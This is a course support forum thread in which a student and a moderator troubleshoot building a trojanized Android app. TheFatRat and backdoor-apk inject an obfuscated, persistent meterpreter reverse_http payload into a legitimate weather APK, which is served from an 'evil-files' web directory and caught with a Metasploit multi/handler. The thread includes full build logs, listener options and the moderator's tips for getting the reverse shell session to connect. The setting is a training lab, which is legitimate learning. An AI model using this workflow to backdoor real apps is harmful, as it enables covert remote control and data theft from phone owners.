- This topic has 11 replies, 3 voices, and was last updated 1 year, 5 months ago by Diego Pérez.
- June 3, 2023 at 5:42 pm #72800 buystuff1234 Participant
Hello,
I get this error message in fatrat when trying to create the apk. I follow the instructions from the course. But maybe the issue has to do with the fact that when I run 'update-alternatives --config java' I get Java version 17 and Java 11 as options. I tried them both, but received the same error. So I am not able to choose version 8 as the course says.
Thank you in advance
- June 3, 2023 at 6:57 pm #72803 Diego Pérez Moderator
Hi!
The image wasn’t uploaded, can you try it again?
Greetings!
Diego
- June 4, 2023 at 12:40 pm #72814 buystuff1234 Participant
Hey Diego,
Here is the screenshot, but I also tried a different application instead of the Flappy Bird one from the course. When I used Angry Birds it completed the apk successfully. And I followed all the following steps: moving it to my /var/www/html/evil-files/ and setting up a new listener on metasploit, using exploit/multi/handler/, setting payload /android/meterpreter/reverse_http (tried tcp as well), setting lhost to my IP address and setting lport 8080 (tried 4444 also).
Then exploit to listen to new incoming agents.
Running apache2 and using an android phone to download the application. All of this goes without issues: I download and install the application from the apache server, but I don't get the meterpreter session. What am I missing?
- June 5, 2023 at 9:21 pm #72825 Diego Pérez Moderator
Hi!
Unfortunately the images are not uploading, maybe upload them to google drive and share the link here.
Also, for this attack to work you need a wireless adapter, do you have one?
Make sure that you’re using the same payload when generating the backdoor and when using multi handler. If you’re already doing that, then try using a different port. If you’re still having issues, then please show me the following:
1. Result of ifconfig and route -n in Kali.
2. The ip of the phone.
3. The options used for generating the backdoor fatrat.
4. The result of show options before running the multi handler.
Let me know.
Diego
- June 26, 2023 at 3:58 pm #73124 buystuff1234 Participant
Hello Diego,
Why do I need to use a wireless adapter? The course says nothing about a wireless adapter.
Here the course tells you to create a malicious apk file and then place it in your evil-files on your apache server,
and to download it with an android device that is connected to the same network. I have a wireless adapter if needed.
I'm failing to get the meterpreter session.
- June 26, 2023 at 9:32 pm #73130 Diego Pérez Moderator
Hi!
Well, you need a wireless adapter because a mobile phone can’t connect to the virtual network created by VMware, hence we need to connect kali to the real network, and that’s the use of the wireless adapter. So, connect the adapter to the network and create a malicious APK using the ip of the wireless adapter interface (usually wlan0) as LHOST.
Greetings!
Diego
- July 5, 2023 at 3:58 pm #73225 buystuff1234 Participant
Hello Diego,
I did what you said and used the wlan0 IP address to create the apk, but still didn't get a meterpreter session. I also tried lport 4444, but without result.
Any ideas what I could do differently?
Thanks
- July 5, 2023 at 9:39 pm #73229 Diego Pérez Moderator
Hi!
Make sure that you’re using the same payload when generating the backdoor and when using multi handler. If you’re already doing that, then try using a different port. If you’re still having issues, then please show me the following:
1. Result of ifconfig and route -n in Kali.
2. ip of the device.
3. The result of options before generating the malicious APK.
4. The result of show options before running the multi handler.
Let me know.
Diego
- July 6, 2023 at 12:54 pm #73239 buystuff1234 Participant
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
RX packets 4825 bytes 2941520 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5780 bytes 891394 (870.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1004 bytes 106816 (104.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1004 bytes 106816 (104.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 3229 bytes 1507100 (1.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4378 bytes 445050 (434.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
RX packets 292 bytes 173648 (169.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2738 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
root@kali:~#
IP device: 192.168.100.129
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]
Cleaning Temp files
Done!
Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :
Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+——————————————-+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+——————————————-+
Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+————————————-+
| [ 1 ] Use Backdoor-apk 0.2.4a |
| [ 2 ] Use old Fatrat method |
| [ 3 ] Use MsfVenom Embedded method |
+————————————-+
Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+————++————————-++———————–+
| Name || Descript || Your Input
+————++————————-++———————–+
| LHOST || The Listen Addres || 192.168.100.106
| LPORT || The Listen Ports || 8080
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
+————++————————-++———————–+
Dana James Traversie
[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.
[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apk
Do you want to create a listener for this configuration
to use in msfconsole in future ?
Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.100.106 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
— —-
0 Wildcard Target
msf6 exploit(multi/handler) >
- July 6, 2023 at 9:24 pm #73245 Diego Pérez Moderator
Hi!
Cool, are you able to reach kali’s web server from your phone?
You can also try to use a different payload, try with the tcp one. Or even use a different APK.
Greetings!
Diego
- July 26, 2023 at 11:13 pm #74512 Hossam H.I.M Participant
Hi Diego, I am wondering why Kali Windows 64 bit became Apple M1 after installation. Everything was going well until I realized that Kali has Apple written on it in the program; then when I tried it, it wouldn't work, saying that the version is not correct. I deleted it and did it again, with the same result. I deleted it again with 7 Zip and VMware, also the same problem; plus, when I reinstalled 7 Zip and extracted it, it did not extract like the first time and extracted other files. I troubleshot the PC and recovered the Windows defaults.
- July 27, 2023 at 8:58 pm #74530 Diego Pérez Moderator
Hi!
It seems you are downloading the wrong version, if you are using windows make sure to follow the instructions as in the windows installation lecture and use the exact same link that Zaid points out.
Greetings!
Diego